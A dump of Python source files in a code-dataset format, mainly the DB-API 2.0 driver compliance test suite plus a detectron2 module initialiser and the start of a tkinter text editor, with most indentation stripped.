cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany()
self.assertEqual(len(r),1,
'cursor.fetchmany retrieved incorrect number of rows, '
'default of arraysize is one.'
)
cur.arraysize=10
r = cur.fetchmany(3) # Should get 3 rows
self.assertEqual(len(r),3,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should get 2 more
self.assertEqual(len(r),2,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should be an empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence after '
'results are exhausted'
)
self.failUnless(cur.rowcount in (-1,6))
# Same as above, using cursor.arraysize
cur.arraysize=4
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany() # Should get 4 rows
self.assertEqual(len(r),4,
'cursor.arraysize not being honoured by fetchmany'
)
r = cur.fetchmany() # Should get 2 more
self.assertEqual(len(r),2)
r = cur.fetchmany() # Should be an empty sequence
self.assertEqual(len(r),0)
self.failUnless(cur.rowcount in (-1,6))
cur.arraysize=6
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchmany() # Should get all rows
self.failUnless(cur.rowcount in (-1,6))
            self.assertEqual(len(rows),6)
rows = [r[0] for r in rows]
rows.sort()
# Make sure we get the right data back out
for i in range(0,6):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved by cursor.fetchmany'
)
rows = cur.fetchmany() # Should return an empty list
self.assertEqual(len(rows),0,
'cursor.fetchmany should return an empty sequence if '
'called after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,6))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
r = cur.fetchmany() # Should get empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence if '
'query retrieved no rows'
)
self.failUnless(cur.rowcount in (-1,0))
finally:
con.close()
def test_fetchall(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchall should raise an Error if called
# without executing a query that may return rows (such
# as a select)
self.assertRaises(self.driver.Error, cur.fetchall)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
# cursor.fetchall should raise an Error if called
            # after executing a statement that cannot return rows
self.assertRaises(self.driver.Error,cur.fetchall)
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.assertEqual(len(rows),len(self.samples),
'cursor.fetchall did not retrieve all rows'
)
rows = [r[0] for r in rows]
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'cursor.fetchall retrieved incorrect rows'
)
rows = cur.fetchall()
self.assertEqual(
len(rows),0,
'cursor.fetchall should return an empty list if called '
'after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,0))
self.assertEqual(len(rows),0,
'cursor.fetchall should return an empty list if '
'a select query returns no rows'
)
finally:
con.close()
def test_mixedfetch(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
rows1 = cur.fetchone()
rows23 = cur.fetchmany(2)
rows4 = cur.fetchone()
rows56 = cur.fetchall()
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows23),2,
'fetchmany returned incorrect number of rows'
)
self.assertEqual(len(rows56),2,
'fetchall returned incorrect number of rows'
)
rows = [rows1[0]]
rows.extend([rows23[0][0],rows23[1][0]])
rows.append(rows4[0])
rows.extend([rows56[0][0],rows56[1][0]])
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved or inserted'
)
finally:
con.close()
def help_nextset_setUp(self,cur):
''' Should create a procedure called deleteme
that returns two result sets, first the
number of rows in booze then "name from booze"
'''
raise NotImplementedError('Helper not implemented')
#sql="""
# create procedure deleteme as
# begin
# select count(*) from booze
# select name from booze
# end
#"""
#cur.execute(sql)
def help_nextset_tearDown(self,cur):
'If cleaning up is needed after nextSetTest'
raise NotImplementedError('Helper not implemented')
#cur.execute("drop procedure deleteme")
def test_nextset(self):
con = self._connect()
try:
cur = con.cursor()
if not hasattr(cur,'nextset'):
return
try:
self.executeDDL1(cur)
                for sql in self._populate():
cur.execute(sql)
self.help_nextset_setUp(cur)
cur.callproc('deleteme')
numberofrows=cur.fetchone()
assert numberofrows[0]== len(self.samples)
assert cur.nextset()
names=cur.fetchall()
assert len(names) == len(self.samples)
s=cur.nextset()
assert s == None,'No more return sets, should return None'
finally:
self.help_nextset_tearDown(cur)
finally:
con.close()
    def test_nextset(self):
        # Deliberately redefined: the version above is only a template, and
        # each driver must override this test with a working implementation.
        raise NotImplementedError('Drivers need to override this test')
def test_arraysize(self):
# Not much here - rest of the tests for this are in test_fetchmany
con = self._connect()
try:
cur = con.cursor()
self.failUnless(hasattr(cur,'arraysize'),
'cursor.arraysize must be defined'
)
finally:
con.close()
def test_setinputsizes(self):
con = self._connect()
try:
cur = con.cursor()
cur.setinputsizes( (25,) )
self._paraminsert(cur) # Make sure cursor still works
finally:
con.close()
def test_setoutputsize_basic(self):
# Basic test is to make sure setoutputsize doesn't blow up
con = self._connect()
try:
cur = con.cursor()
cur.setoutputsize(1000)
cur.setoutputsize(2000,0)
self._paraminsert(cur) # Make sure the cursor still works
finally:
con.close()
def test_setoutputsize(self):
# Real test for setoutputsize is driver dependent
raise NotImplementedError('Driver needed to override this test')
def test_None(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
cur.execute('insert into %sbooze values (NULL)' % self.table_prefix)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchall()
self.assertEqual(len(r),1)
self.assertEqual(len(r[0]),1)
self.assertEqual(r[0][0],None,'NULL value not returned as None')
finally:
con.close()
def test_Date(self):
d1 = self.driver.Date(2002,12,25)
d2 = self.driver.DateFromTicks(time.mktime((2002,12,25,0,0,0,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(d1),str(d2))
def test_Time(self):
t1 = self.driver.Time(13,45,30)
t2 = self.driver.TimeFromTicks(time.mktime((2001,1,1,13,45,30,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(t1),str(t2))
def test_Timestamp(self):
t1 = self.driver.Timestamp(2002,12,25,13,45,30)
t2 = self.driver.TimestampFromTicks(
time.mktime((2002,12,25,13,45,30,0,0,0))
)
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(t1),str(t2))
def test_Binary(self):
b = self.driver.Binary(str2bytes('Something'))
b = self.driver.Binary(str2bytes(''))
def test_STRING(self):
self.failUnless(hasattr(self.driver,'STRING'),
'module.STRING must be defined'
)
def test_BINARY(self):
self.failUnless(hasattr(self.driver,'BINARY'),
'module.BINARY must be defined.'
)
def test_NUMBER(self):
self.failUnless(hasattr(self.driver,'NUMBER'),
'module.NUMBER must be defined.'
)
def test_DATETIME(self):
self.failUnless(hasattr(self.driver,'DATETIME'),
'module.DATETIME must be defined.'
)
def test_ROWID(self):
self.failUnless(hasattr(self.driver,'ROWID'),
'module.ROWID must be defined.'
)
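# A minimal driver-subclass sketch, following the class docstring above. The
# dsn is a placeholder and psycopg2 is only an example DB API 2.0 module; the
# two overrides silence the tests every driver must specialise.
def _example_driver_subclass():
    import psycopg2
    class Psycopg2As20Test(DatabaseAPI20Test):
        driver = psycopg2
        connect_kw_args = {'dsn': 'dbname=dbapi20_test'}
        def test_nextset(self): pass
        def test_setoutputsize(self): pass
    return Psycopg2As20Test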
| 36.982818
| 80
| 0.563805
|
__rcs_id__ = '$Id: dbapi20.py,v 1.11 2005/01/02 02:41:01 zenzen Exp $'
__version__ = '$Revision: 1.12 $'[11:-2]
__author__ = 'Stuart Bishop <stuart@stuartbishop.net>'
import unittest
import time
import sys
def str2bytes(sval):
if sys.version_info < (3,0) and isinstance(sval, str):
sval = sval.decode("latin1")
return sval.encode("latin1")
class DatabaseAPI20Test(unittest.TestCase):
driver = None
    connect_args = ()
    connect_kw_args = {}
    table_prefix = 'dbapi20test_'
ddl1 = 'create table %sbooze (name varchar(20))' % table_prefix
ddl2 = 'create table %sbarflys (name varchar(20))' % table_prefix
xddl1 = 'drop table %sbooze' % table_prefix
xddl2 = 'drop table %sbarflys' % table_prefix
lowerfunc = 'lower'
def executeDDL1(self,cursor):
cursor.execute(self.ddl1)
def executeDDL2(self,cursor):
cursor.execute(self.ddl2)
def setUp(self):
pass
def tearDown(self):
con = self._connect()
try:
cur = con.cursor()
for ddl in (self.xddl1,self.xddl2):
try:
cur.execute(ddl)
con.commit()
except self.driver.Error:
pass
finally:
con.close()
def _connect(self):
try:
return self.driver.connect(
*self.connect_args,**self.connect_kw_args
)
except AttributeError:
self.fail("No connect method found in self.driver module")
def test_connect(self):
con = self._connect()
con.close()
def test_apilevel(self):
try:
# Must exist
apilevel = self.driver.apilevel
# Must equal 2.0
self.assertEqual(apilevel,'2.0')
except AttributeError:
self.fail("Driver doesn't define apilevel")
def test_threadsafety(self):
try:
threadsafety = self.driver.threadsafety
self.failUnless(threadsafety in (0,1,2,3))
except AttributeError:
self.fail("Driver doesn't define threadsafety")
def test_paramstyle(self):
try:
# Must exist
paramstyle = self.driver.paramstyle
# Must be a valid value
self.failUnless(paramstyle in (
'qmark','numeric','named','format','pyformat'
))
except AttributeError:
self.fail("Driver doesn't define paramstyle")
def test_Exceptions(self):
        if sys.version[0] == '3':
            self.failUnless(issubclass(self.driver.Warning,Exception))
self.failUnless(issubclass(self.driver.Error,Exception))
else:
self.failUnless(issubclass(self.driver.Warning,StandardError))
self.failUnless(issubclass(self.driver.Error,StandardError))
self.failUnless(
issubclass(self.driver.InterfaceError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.DatabaseError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.OperationalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.IntegrityError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.InternalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.ProgrammingError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.NotSupportedError,self.driver.Error)
)
def test_ExceptionsAsConnectionAttributes(self):
con = self._connect()
drv = self.driver
self.failUnless(con.Warning is drv.Warning)
self.failUnless(con.Error is drv.Error)
self.failUnless(con.InterfaceError is drv.InterfaceError)
self.failUnless(con.DatabaseError is drv.DatabaseError)
self.failUnless(con.OperationalError is drv.OperationalError)
self.failUnless(con.IntegrityError is drv.IntegrityError)
self.failUnless(con.InternalError is drv.InternalError)
self.failUnless(con.ProgrammingError is drv.ProgrammingError)
self.failUnless(con.NotSupportedError is drv.NotSupportedError)
def test_commit(self):
con = self._connect()
try:
con.commit()
finally:
con.close()
def test_rollback(self):
con = self._connect()
# If rollback is defined, it should either work or throw
# the documented exception
if hasattr(con,'rollback'):
try:
con.rollback()
except self.driver.NotSupportedError:
pass
def test_cursor(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
def test_cursor_isolation(self):
con = self._connect()
try:
# Make sure cursors created from the same connection have
# the documented transaction isolation level
cur1 = con.cursor()
cur2 = con.cursor()
self.executeDDL1(cur1)
cur1.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
cur2.execute("select name from %sbooze" % self.table_prefix)
booze = cur2.fetchall()
self.assertEqual(len(booze),1)
self.assertEqual(len(booze[0]),1)
self.assertEqual(booze[0][0],'Victoria Bitter')
finally:
con.close()
def test_description(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.description,None,
'cursor.description should be none after executing a '
'statement that can return no rows (such as DDL)'
)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(len(cur.description),1,
'cursor.description describes too many columns'
)
self.assertEqual(len(cur.description[0]),7,
'cursor.description[x] tuples must have 7 elements'
)
self.assertEqual(cur.description[0][0].lower(),'name',
'cursor.description[x][0] must return column name'
)
self.assertEqual(cur.description[0][1],self.driver.STRING,
'cursor.description[x][1] must return column type. Got %r'
% cur.description[0][1]
)
# Make sure self.description gets reset
self.executeDDL2(cur)
self.assertEqual(cur.description,None,
'cursor.description not being set to None when executing '
'no-result statements (eg. DDL)'
)
finally:
con.close()
def test_rowcount(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount should be -1 after executing no-result '
'statements'
)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1),
                'cursor.rowcount should == number of rows inserted, or '
'set to -1 after executing an insert statement'
)
cur.execute("select name from %sbooze" % self.table_prefix)
self.failUnless(cur.rowcount in (-1,1),
'cursor.rowcount should == number of rows returned, or '
'set to -1 after executing a select statement'
)
self.executeDDL2(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount not being reset to -1 after executing '
'no-result statements'
)
finally:
con.close()
lower_func = 'lower'
def test_callproc(self):
con = self._connect()
try:
cur = con.cursor()
if self.lower_func and hasattr(cur,'callproc'):
r = cur.callproc(self.lower_func,('FOO',))
self.assertEqual(len(r),1)
self.assertEqual(r[0],'FOO')
r = cur.fetchall()
self.assertEqual(len(r),1,'callproc produced no result set')
self.assertEqual(len(r[0]),1,
'callproc produced invalid result set'
)
self.assertEqual(r[0][0],'foo',
'callproc produced invalid results'
)
finally:
con.close()
def test_close(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
# cursor.execute should raise an Error if called after connection
# closed
self.assertRaises(self.driver.Error,self.executeDDL1,cur)
        # connection.commit should raise an Error if called after connection closed.
self.assertRaises(self.driver.Error,con.commit)
# connection.close should raise an Error if called more than once
# Issue discussed on DB-SIG: consensus seem that close() should not
# raised if called on closed objects. Issue reported back to Stuart.
# self.assertRaises(self.driver.Error,con.close)
def test_execute(self):
con = self._connect()
try:
cur = con.cursor()
self._paraminsert(cur)
finally:
con.close()
def _paraminsert(self,cur):
self.executeDDL1(cur)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1))
if self.driver.paramstyle == 'qmark':
cur.execute(
'insert into %sbooze values (?)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'numeric':
cur.execute(
'insert into %sbooze values (:1)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'named':
cur.execute(
'insert into %sbooze values (:beer)' % self.table_prefix,
{'beer':"Cooper's"}
)
elif self.driver.paramstyle == 'format':
cur.execute(
'insert into %sbooze values (%%s)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'pyformat':
cur.execute(
'insert into %sbooze values (%%(beer)s)' % self.table_prefix,
{'beer':"Cooper's"}
)
else:
self.fail('Invalid paramstyle')
self.failUnless(cur.rowcount in (-1,1))
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,'cursor.fetchall returned too few rows')
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Cooper's",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
self.assertEqual(beers[1],"Victoria Bitter",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
def test_executemany(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
largs = [ ("Cooper's",) , ("Boag's",) ]
margs = [ {'beer': "Cooper's"}, {'beer': "Boag's"} ]
if self.driver.paramstyle == 'qmark':
cur.executemany(
'insert into %sbooze values (?)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'numeric':
cur.executemany(
'insert into %sbooze values (:1)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'named':
cur.executemany(
'insert into %sbooze values (:beer)' % self.table_prefix,
margs
)
elif self.driver.paramstyle == 'format':
cur.executemany(
'insert into %sbooze values (%%s)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'pyformat':
cur.executemany(
'insert into %sbooze values (%%(beer)s)' % (
self.table_prefix
),
margs
)
else:
self.fail('Unknown paramstyle')
self.failUnless(cur.rowcount in (-1,2),
'insert using cursor.executemany set cursor.rowcount to '
'incorrect value %r' % cur.rowcount
)
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,
'cursor.fetchall retrieved incorrect number of rows'
)
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Boag's",'incorrect data retrieved')
self.assertEqual(beers[1],"Cooper's",'incorrect data retrieved')
finally:
con.close()
def test_fetchone(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchone should raise an Error if called before
# executing a select-type query
self.assertRaises(self.driver.Error,cur.fetchone)
# cursor.fetchone should raise an Error if called after
# executing a query that cannot return rows
self.executeDDL1(cur)
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if a query retrieves '
'no rows'
)
self.failUnless(cur.rowcount in (-1,0))
# cursor.fetchone should raise an Error if called after
# executing a query that cannot return rows
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchone()
self.assertEqual(len(r),1,
'cursor.fetchone should have retrieved a single row'
)
self.assertEqual(r[0],'Victoria Bitter',
'cursor.fetchone retrieved incorrect data'
)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if no more rows available'
)
self.failUnless(cur.rowcount in (-1,1))
finally:
con.close()
samples = [
'Carlton Cold',
'Carlton Draft',
'Mountain Goat',
'Redback',
'Victoria Bitter',
'XXXX'
]
def _populate(self):
populate = [
"insert into %sbooze values ('%s')" % (self.table_prefix,s)
for s in self.samples
]
return populate
def test_fetchmany(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchmany should raise an Error if called without
            # issuing a query
self.assertRaises(self.driver.Error,cur.fetchmany,4)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany()
self.assertEqual(len(r),1,
'cursor.fetchmany retrieved incorrect number of rows, '
'default of arraysize is one.'
)
cur.arraysize=10
r = cur.fetchmany(3) # Should get 3 rows
self.assertEqual(len(r),3,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should get 2 more
self.assertEqual(len(r),2,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should be an empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence after '
'results are exhausted'
)
self.failUnless(cur.rowcount in (-1,6))
# Same as above, using cursor.arraysize
cur.arraysize=4
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany() # Should get 4 rows
self.assertEqual(len(r),4,
'cursor.arraysize not being honoured by fetchmany'
)
r = cur.fetchmany() # Should get 2 more
self.assertEqual(len(r),2)
r = cur.fetchmany() # Should be an empty sequence
self.assertEqual(len(r),0)
self.failUnless(cur.rowcount in (-1,6))
cur.arraysize=6
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchmany() # Should get all rows
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows),6)
rows = [r[0] for r in rows]
rows.sort()
# Make sure we get the right data back out
for i in range(0,6):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved by cursor.fetchmany'
)
rows = cur.fetchmany() # Should return an empty list
self.assertEqual(len(rows),0,
'cursor.fetchmany should return an empty sequence if '
'called after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,6))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
r = cur.fetchmany() # Should get empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence if '
'query retrieved no rows'
)
self.failUnless(cur.rowcount in (-1,0))
finally:
con.close()
def test_fetchall(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchall should raise an Error if called
# without executing a query that may return rows (such
# as a select)
self.assertRaises(self.driver.Error, cur.fetchall)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
# cursor.fetchall should raise an Error if called
            # after executing a statement that cannot return rows
self.assertRaises(self.driver.Error,cur.fetchall)
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.assertEqual(len(rows),len(self.samples),
'cursor.fetchall did not retrieve all rows'
)
rows = [r[0] for r in rows]
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'cursor.fetchall retrieved incorrect rows'
)
rows = cur.fetchall()
self.assertEqual(
len(rows),0,
'cursor.fetchall should return an empty list if called '
'after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,0))
self.assertEqual(len(rows),0,
'cursor.fetchall should return an empty list if '
'a select query returns no rows'
)
finally:
con.close()
def test_mixedfetch(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
rows1 = cur.fetchone()
rows23 = cur.fetchmany(2)
rows4 = cur.fetchone()
rows56 = cur.fetchall()
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows23),2,
'fetchmany returned incorrect number of rows'
)
self.assertEqual(len(rows56),2,
'fetchall returned incorrect number of rows'
)
rows = [rows1[0]]
rows.extend([rows23[0][0],rows23[1][0]])
rows.append(rows4[0])
rows.extend([rows56[0][0],rows56[1][0]])
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved or inserted'
)
finally:
con.close()
def help_nextset_setUp(self,cur):
raise NotImplementedError('Helper not implemented')
#sql="""
# create procedure deleteme as
# begin
# select count(*) from booze
# select name from booze
# end
#"""
#cur.execute(sql)
def help_nextset_tearDown(self,cur):
raise NotImplementedError('Helper not implemented')
#cur.execute("drop procedure deleteme")
def test_nextset(self):
con = self._connect()
try:
cur = con.cursor()
if not hasattr(cur,'nextset'):
return
try:
self.executeDDL1(cur)
                for sql in self._populate():
cur.execute(sql)
self.help_nextset_setUp(cur)
cur.callproc('deleteme')
numberofrows=cur.fetchone()
assert numberofrows[0]== len(self.samples)
assert cur.nextset()
names=cur.fetchall()
assert len(names) == len(self.samples)
s=cur.nextset()
assert s == None,'No more return sets, should return None'
finally:
self.help_nextset_tearDown(cur)
finally:
con.close()
def test_nextset(self):
raise NotImplementedError('Drivers need to override this test')
def test_arraysize(self):
# Not much here - rest of the tests for this are in test_fetchmany
con = self._connect()
try:
cur = con.cursor()
self.failUnless(hasattr(cur,'arraysize'),
'cursor.arraysize must be defined'
)
finally:
con.close()
def test_setinputsizes(self):
con = self._connect()
try:
cur = con.cursor()
cur.setinputsizes( (25,) )
self._paraminsert(cur) # Make sure cursor still works
finally:
con.close()
def test_setoutputsize_basic(self):
# Basic test is to make sure setoutputsize doesn't blow up
con = self._connect()
try:
cur = con.cursor()
cur.setoutputsize(1000)
cur.setoutputsize(2000,0)
            self._paraminsert(cur) # cursor must still work after setoutputsize
        finally:
con.close()
def test_setoutputsize(self):
raise NotImplementedError('Driver needed to override this test')
def test_None(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
cur.execute('insert into %sbooze values (NULL)' % self.table_prefix)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchall()
self.assertEqual(len(r),1)
self.assertEqual(len(r[0]),1)
self.assertEqual(r[0][0],None,'NULL value not returned as None')
finally:
con.close()
def test_Date(self):
d1 = self.driver.Date(2002,12,25)
d2 = self.driver.DateFromTicks(time.mktime((2002,12,25,0,0,0,0,0,0)))
# self.assertEqual(str(d1),str(d2))
def test_Time(self):
t1 = self.driver.Time(13,45,30)
t2 = self.driver.TimeFromTicks(time.mktime((2001,1,1,13,45,30,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
def test_Timestamp(self):
t1 = self.driver.Timestamp(2002,12,25,13,45,30)
t2 = self.driver.TimestampFromTicks(
time.mktime((2002,12,25,13,45,30,0,0,0))
)
# self.assertEqual(str(t1),str(t2))
def test_Binary(self):
b = self.driver.Binary(str2bytes('Something'))
b = self.driver.Binary(str2bytes(''))
def test_STRING(self):
self.failUnless(hasattr(self.driver,'STRING'),
'module.STRING must be defined'
)
def test_BINARY(self):
self.failUnless(hasattr(self.driver,'BINARY'),
'module.BINARY must be defined.'
)
def test_NUMBER(self):
self.failUnless(hasattr(self.driver,'NUMBER'),
'module.NUMBER must be defined.'
)
def test_DATETIME(self):
self.failUnless(hasattr(self.driver,'DATETIME'),
'module.DATETIME must be defined.'
)
def test_ROWID(self):
self.failUnless(hasattr(self.driver,'ROWID'),
'module.ROWID must be defined.'
)
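# A hedged usage sketch, not part of the suite itself: everything above is
# abstract, with ``self.driver``, ``self._connect`` and the DDL helpers
# supplied by a concrete driver subclass. Under the usual dbapi20
# conventions, a minimal sqlite3 binding might look like the sketch below;
# the base-class name ``DatabaseAPI20Test`` and the attribute names are
# assumptions to be checked against the class defined earlier in this file.
#
#   import sqlite3
#   import unittest
#
#   class Sqlite3Test(DatabaseAPI20Test, unittest.TestCase):
#       driver = sqlite3
#       connect_args = (':memory:',)
#       connect_kw_args = {}
#       table_prefix = 'dbapi20test_'
#
#   if __name__ == '__main__':
#       unittest.main()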
| true
| true
|
f707c0ae92a93fe6a51157199678cfdc29d63820
| 647
|
py
|
Python
|
detectron2/modeling/roi_heads/__init__.py
|
MargeryLab/BMaskR-CNN
|
41f63d301d6be7fa30ba281a5a0f727fbca6ad2a
|
[
"Apache-2.0"
] | null | null | null |
detectron2/modeling/roi_heads/__init__.py
|
MargeryLab/BMaskR-CNN
|
41f63d301d6be7fa30ba281a5a0f727fbca6ad2a
|
[
"Apache-2.0"
] | null | null | null |
detectron2/modeling/roi_heads/__init__.py
|
MargeryLab/BMaskR-CNN
|
41f63d301d6be7fa30ba281a5a0f727fbca6ad2a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .box_head import ROI_BOX_HEAD_REGISTRY, build_box_head
from .keypoint_head import ROI_KEYPOINT_HEAD_REGISTRY, build_keypoint_head, BaseKeypointRCNNHead
from .mask_head import ROI_MASK_HEAD_REGISTRY, build_mask_head, BaseMaskRCNNHead
from .roi_heads import (
ROI_HEADS_REGISTRY,
ROIHeads,
Res5ROIHeads,
StandardROIHeads,
build_roi_heads,
select_foreground_proposals,
)
from .rotated_fast_rcnn import RROIHeads
from .fast_rcnn import FastRCNNOutputLayers
from . import cascade_rcnn # isort:skip
__all__ = list(globals().keys())
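# A hedged usage sketch of the registry exported above: registration makes a
# head selectable by name through cfg.MODEL.ROI_HEADS.NAME. ``MyROIHeads`` is
# an illustrative name, and a real head would override forward() rather than
# pass.
#
#   from detectron2.modeling.roi_heads import ROI_HEADS_REGISTRY, StandardROIHeads
#
#   @ROI_HEADS_REGISTRY.register()
#   class MyROIHeads(StandardROIHeads):
#       pass
#
#   # config side: cfg.MODEL.ROI_HEADS.NAME = "MyROIHeads"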
| 34.052632
| 97
| 0.788253
|
from .box_head import ROI_BOX_HEAD_REGISTRY, build_box_head
from .keypoint_head import ROI_KEYPOINT_HEAD_REGISTRY, build_keypoint_head, BaseKeypointRCNNHead
from .mask_head import ROI_MASK_HEAD_REGISTRY, build_mask_head, BaseMaskRCNNHead
from .roi_heads import (
ROI_HEADS_REGISTRY,
ROIHeads,
Res5ROIHeads,
StandardROIHeads,
build_roi_heads,
select_foreground_proposals,
)
from .rotated_fast_rcnn import RROIHeads
from .fast_rcnn import FastRCNNOutputLayers
from . import cascade_rcnn
__all__ = list(globals().keys())
| true
| true
|
f707c12de9ebdb3505ba90ea1666b679abd69286
| 3,352
|
py
|
Python
|
main.py
|
JustKappaMan/Ugly-Text-Editor
|
40fb9e72afde335335adec25bdebbdee1f5c44e7
|
[
"MIT"
] | null | null | null |
main.py
|
JustKappaMan/Ugly-Text-Editor
|
40fb9e72afde335335adec25bdebbdee1f5c44e7
|
[
"MIT"
] | null | null | null |
main.py
|
JustKappaMan/Ugly-Text-Editor
|
40fb9e72afde335335adec25bdebbdee1f5c44e7
|
[
"MIT"
] | null | null | null |
import os.path
import tkinter as tk
import tkinter.filedialog as fd
import tkinter.messagebox as mb
def main():
text_editor = TextEditor()
text_editor.mainloop()
class TextEditor(tk.Tk):
def __init__(self):
super(TextEditor, self).__init__()
self.title('Ugly Text Editor')
self.option_add('*Dialog.msg.font', 'Arial 12')
self.minsize(640, 360)
self.maxsize(self.winfo_screenwidth(), self.winfo_screenheight())
self.scrollbar = tk.Scrollbar(self)
self.scrollbar.pack(fill='y', side='right')
self.text_field = tk.Text(self, bd=0, highlightthickness=0, yscrollcommand=self.scrollbar.set)
self.text_field.pack(fill='both', expand=True)
self.scrollbar.config(command=self.text_field.yview)
self.menu_bar = tk.Menu(self)
self.file_menu = tk.Menu(self.menu_bar, tearoff=0)
self.file_menu.add_command(label='New', accelerator='Ctrl+N', command=self.new_file)
self.file_menu.add_command(label='Open...', accelerator='Ctrl+O', command=self.open_file)
self.file_menu.add_separator()
self.file_menu.add_command(label='Save', accelerator='Ctrl+S', command=self.save_file)
